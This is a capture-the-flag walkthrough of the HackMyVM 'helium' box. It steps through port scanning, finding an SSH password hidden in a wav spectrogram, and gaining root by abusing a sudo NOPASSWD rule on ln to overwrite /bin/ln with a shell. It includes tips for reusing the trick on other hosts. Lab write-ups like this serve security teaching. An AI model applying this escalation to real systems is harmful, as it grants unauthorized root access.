
HMV-helium

Writeup of the HMV-helium box

Port scan

┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.240.53
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-02 20:18 CST
Nmap scan report for 192.168.240.53
Host is up (0.0020s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 12:f6:55:5f:c6:fa:fb:14:15:ae:4a:2b:38:d8:4a:30 (RSA)
| 256 b7:ac:87:6d:c4:f9:e3:9a:d4:6e:e0:4f:da:aa:22:20 (ECDSA)
|_ 256 fe:e8:05:af:23:4d:3a:82:2a:64:9b:f7:35:e4:44:4a (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: RELAX
MAC Address: 56:BD:76:3F:EB:82 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 2.03 ms 192.168.240.53

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.43 seconds

Only ports 22 and 80 are open, so we go straight to the web part.

Web enumeration

┌──(root㉿kakeru)-[~/tmp]
└─# curl http://192.168.240.53
<title>RELAX</title>
<!doctype html>
<html lang="en">

<!-- Please paul, stop uploading weird .wav files using /upload_sound -->

<head>
<style>
body {
background-image: url('screen-1.jpg');
background-repeat: no-repeat;
background-attachment: fixed;
background-size: 100% 100%;
}
</style>
<link href="bootstrap.min.css" rel="stylesheet">
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>

<body>
<audio src="relax.wav" preload="auto loop" controls></audio>
<body>

This reveals a username, paul, a directory /upload_sound, and a relax.wav that can be downloaded.
I assumed it was about wav steganography, but I am not very familiar with misc and fiddled with this wav for a long time without finding anything; it turned out I was looking in the wrong place.
The bootstrap.min.css referenced in the source is accessible, and it contains the path of another wav file; that is the one that actually needs analysing.

┌──(root㉿kakeru)-[~/tmp]
└─# curl http://192.168.240.53/bootstrap.min.css
/yay/mysecretsound.wav

Open the file in Audacity and switch to the spectrogram view: text appears in the spectrogram, and that text is the password.
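Audacity is the usual tool, but the same check can be scripted. The following is an added example, not code from the original writeup: a stdlib-only Python spectrogram that prints a wav as text (time left to right, low frequencies at the bottom, like Audacity's spectrogram view) and lists the loudest frequency in each frame. The three-tone 8 kHz wav it builds when run without arguments is constructed test input, not the box's mysecretsound.wav; pass the real file as the first argument to inspect it.

```python
"""Added example, not part of the original writeup: a stdlib-only spectrogram
viewer so hidden text in a wav can be checked from a terminal instead of
Audacity.  The tone list and the 8 kHz test wav below are constructed sample
input; run `python3 spec.py mysecretsound.wav` to look at a real file."""
import io
import math
import struct
import sys
import wave


def make_test_wav(freqs, seg_seconds=0.1, rate=8000):
    """Constructed sample: one pure tone per entry in freqs, back to back (16-bit mono PCM)."""
    n = round(seg_seconds * rate)
    pcm = bytearray()
    for f in freqs:
        for i in range(n):
            pcm += struct.pack("<h", int(0.8 * 32767 * math.sin(2 * math.pi * f * i / rate)))
    buf = io.BytesIO()
    with wave.open(buf, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(rate)
        w.writeframes(bytes(pcm))
    return buf.getvalue()


def read_mono(data):
    """Decode a 16-bit PCM wav (bytes) into (rate, samples scaled to -1..1); stereo keeps channel 0."""
    with wave.open(io.BytesIO(data), "rb") as w:
        nch, width, rate = w.getnchannels(), w.getsampwidth(), w.getframerate()
        raw = w.readframes(w.getnframes())
    if width != 2:
        raise ValueError("only 16-bit PCM is handled here")
    pcm = struct.unpack("<%dh" % (len(raw) // 2), raw)
    return rate, [s / 32768.0 for s in pcm[::nch]]


def spectrogram(samples, rate, frame, bins, fmax):
    """Naive Hann-windowed DFT per frame (no numpy): rows[t][b] is the magnitude at
    frequency fmax*b/bins during frame t.  Fine for short clips; use numpy's FFT for long files."""
    hann = [0.5 - 0.5 * math.cos(2 * math.pi * i / frame) for i in range(frame)]
    freqs = [fmax * b / bins for b in range(bins)]
    rows = []
    for start in range(0, len(samples) - frame + 1, frame):
        seg = [samples[start + i] * hann[i] for i in range(frame)]
        row = []
        for f in freqs:
            step = 2 * math.pi * f / rate
            re = sum(x * math.cos(step * i) for i, x in enumerate(seg))
            im = sum(x * math.sin(step * i) for i, x in enumerate(seg))
            row.append(math.hypot(re, im))
        rows.append(row)
    return rows


def dominant_frequencies(rows, bins, fmax):
    """Loudest analysis frequency (Hz) in each frame; a tone that steps between
    frequencies shows up as a step sequence here even before you look at the picture."""
    return [fmax * max(range(bins), key=row.__getitem__) / bins for row in rows]


def render(rows, max_cols=120):
    """Text spectrogram laid out like Audacity's view: time left to right, low frequencies at the bottom."""
    if not rows:
        return ""
    ramp = " .:-=+*#%@"
    cols = rows[::max(1, len(rows) // max_cols)]  # thin out long files to fit a terminal
    peak = max(max(r) for r in cols) or 1.0
    lines = []
    for b in reversed(range(len(cols[0]))):
        lines.append("".join(ramp[min(9, int(9 * c[b] / peak))] for c in cols))
    return "\n".join(lines)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        data = open(sys.argv[1], "rb").read()
    else:
        data = make_test_wav([625, 1625, 2625])  # constructed input, not the box's file
    rate, samples = read_mono(data)
    rows = spectrogram(samples, rate, frame=rate // 40, bins=32, fmax=rate / 2)  # 25 ms frames
    print(render(rows))
    print(dominant_frequencies(rows, 32, rate / 2))
```

The DFT is written out by hand so the script has no dependencies, which makes it slow on a multi-minute 44.1 kHz file; for real work swap spectrogram() for a numpy FFT, the layout and the per-frame argmax check stay the same.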


dancingpassyo
With it we get a user shell over SSH.

┌──(root㉿kakeru)-[~/tmp]
└─# ssh paul@192.168.240.53
The authenticity of host '192.168.240.53 (192.168.240.53)' can't be established.
ED25519 key fingerprint is SHA256:y4b6laUdkY6jY95p0UousHuja503C9EIqNNrMD5hoqA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.240.53' (ED25519) to the list of known hosts.
paul@192.168.240.53's password:
Permission denied, please try again.
paul@192.168.240.53's password:
Linux helium 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Nov 22 14:31:51 2020 from 192.168.1.58
paul@helium:~$

Privilege escalation

sudo -l shows one rule: paul may run a single program through sudo.

paul@helium:~$ sudo -l
Matching Defaults entries for paul on helium:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User paul may run the following commands on helium:
(ALL : ALL) NOPASSWD: /usr/bin/ln
paul@helium:~$ file /usr/bin/ln
/usr/bin/ln: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=90900bc68d91aa5931e338d6445b520777431a02, stripped

The privilege-escalation commands: replace /bin/ln with a link to a shell, then run "ln" through sudo.

sudo ln -fs /bin/sh /bin/ln
sudo ln

That gives a root shell; done.

paul@helium:~$ sudo ln -fd /bin/bash /bin/ln
paul@helium:~$ sudo ln
root@helium:/home/paul#

Explanation of the privilege-escalation command

📌 What ln does
ln is the Linux command for creating links, either hard links or symbolic (soft) links.

🔍 Basic usage of ln

ln [options] TARGET LINK_NAME

Hard link (default): without -s, creates another directory entry that refers to the same inode as TARGET.
Symbolic link (soft link): with -s, creates a small file that stores the path of TARGET and is followed whenever the link is opened.

Breaking down sudo ln -fs /bin/sh /bin/ln

This command replaces /bin/ln with a symbolic link to /bin/sh, forcing the overwrite.

ln

ln creates hard or symbolic links; here it is used to replace the system's own ln command.

-f

-f forces the overwrite: if /bin/ln already exists it is unlinked first and then replaced.

-s

-s makes a symbolic link (soft link) rather than a hard link.

/bin/sh

/bin/sh is the target; the new /bin/ln will point at it.

/bin/ln

/bin/ln is the link name; after the command, /bin/ln is an alias for /bin/sh.

Because /bin/ln now points to /bin/sh, sudo ln is effectively sudo /bin/sh, and the (ALL : ALL) NOPASSWD rule makes sudo run it as root.

Three things worth checking before reusing this on another box:

sudo ignores the caller's PATH and resolves the bare "ln" through the secure_path printed by sudo -l, in which /usr/bin comes before /bin. Overwriting /bin/ln only changed what sudo ran because /bin and /usr/bin are the same directory on this host (which is also why file /usr/bin/ln found the binary while the commands targeted /bin/ln). On a system where /bin is a separate directory, overwrite /usr/bin/ln, the path the sudoers rule names, instead; ls -li /bin/ln /usr/bin/ln shows whether the two names share an inode.

The command actually typed in the session was sudo ln -fd /bin/bash /bin/ln, a hard link to bash rather than a symlink to sh. -d only matters when the target is a directory, so on a regular file it is just a forced hard link. Either form works, because sudo executes whatever file now sits at that name, as root.

Both forms destroy the real ln binary: -f unlinks /bin/ln and the original file loses its name. Copy it aside first (cp /bin/ln /tmp/ln works, the binary is world-readable) so the root shell can put it back with cp; otherwise the box is left without a working ln.
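As an added example, written for this page and not taken from the original writeup, the following Python models the two ln forms and sudo's secure_path lookup inside a throwaway directory. The fake ln, sh and bash scripts and the merged-versus-split /usr layouts are constructed stand-ins; SECURE_PATH is copied from the sudo -l output above. Nothing outside the temp directories is touched.

```python
"""Added example, not part of the original writeup: model what `ln -f`, `ln -fs`
and sudo's secure_path lookup do, inside a throwaway directory, to show why
`sudo ln` turns into a root shell once /bin/ln has been replaced.  The fake
ln/sh/bash scripts below are constructed stand-ins for the real binaries."""
import os
import tempfile

# secure_path exactly as printed by `sudo -l` on helium; sudo uses it instead of the caller's PATH
SECURE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"


def ln(target, link, symbolic=False, force=False):
    """Minimal model of GNU ln: -f unlinks an existing LINK_NAME first, -s makes a symlink."""
    if force and os.path.lexists(link):
        os.unlink(link)
    if symbolic:
        os.symlink(target, link)   # stores the path string; followed when the link is opened
    else:
        os.link(target, link)      # a second directory entry for the same inode


def resolve(name, path_list, root=""):
    """Mimic sudo's command lookup: the first executable regular file NAME along PATH_LIST.
    ROOT prefixes every directory so the walk stays inside the sandbox."""
    for d in path_list.split(":"):
        cand = os.path.join(root + d, name)
        if os.path.isfile(cand) and os.access(cand, os.X_OK):
            return cand
    return None


def write_exe(path, body):
    with open(path, "w") as f:
        f.write(body)
    os.chmod(path, 0o755)


def demo_symlink(merged_usr):
    """The writeup's command, sudo ln -fs /bin/sh /bin/ln, run against a fake root.
    merged_usr=True models a layout where /bin is a symlink to /usr/bin, as on helium;
    False models a split /bin and /usr/bin.  Returns the file `sudo ln` would now run,
    as a path relative to the fake root."""
    root = tempfile.mkdtemp()
    os.makedirs(root + "/usr/bin")
    write_exe(root + "/usr/bin/ln", "#!/bin/sh\necho real ln\n")
    write_exe(root + "/usr/bin/sh", "#!/bin/sh\necho root shell\n")
    if merged_usr:
        os.symlink("usr/bin", root + "/bin")
    else:
        os.makedirs(root + "/bin")
        write_exe(root + "/bin/ln", "#!/bin/sh\necho real ln\n")
        write_exe(root + "/bin/sh", "#!/bin/sh\necho root shell\n")
    ln(root + "/bin/sh", root + "/bin/ln", symbolic=True, force=True)
    hit = resolve("ln", SECURE_PATH, root=root)  # /usr/bin is searched before /bin
    return os.path.realpath(hit)[len(os.path.realpath(root)):]


def demo_hardlink():
    """What was actually typed on the box: sudo ln -fd /bin/bash /bin/ln.
    -d only matters for directory targets, so on a regular file this is a plain forced hard link."""
    root = tempfile.mkdtemp()
    os.makedirs(root + "/bin")
    write_exe(root + "/bin/bash", "#!/bin/sh\necho root shell\n")
    write_exe(root + "/bin/ln", "#!/bin/sh\necho real ln\n")
    old_ino = os.stat(root + "/bin/ln").st_ino
    ln(root + "/bin/bash", root + "/bin/ln", force=True)
    new_ln, bash = os.stat(root + "/bin/ln"), os.stat(root + "/bin/bash")
    return {
        "same_inode": new_ln.st_ino == bash.st_ino,  # /bin/ln is now literally the bash binary
        "bash_names": bash.st_nlink,                 # 2: one inode, two directory entries
        "old_ln_gone": new_ln.st_ino != old_ino,     # the real ln lost its only name
    }


if __name__ == "__main__":
    print("merged /usr:", demo_symlink(True))    # /usr/bin/sh -> sudo ln gives a root shell
    print("split /bin :", demo_symlink(False))   # /usr/bin/ln -> still the real ln
    print("hard link  :", demo_hardlink())
```

The split-layout case is the one to remember: the same two commands leave sudo running the untouched /usr/bin/ln, which is why the target should be the exact path the sudoers rule names.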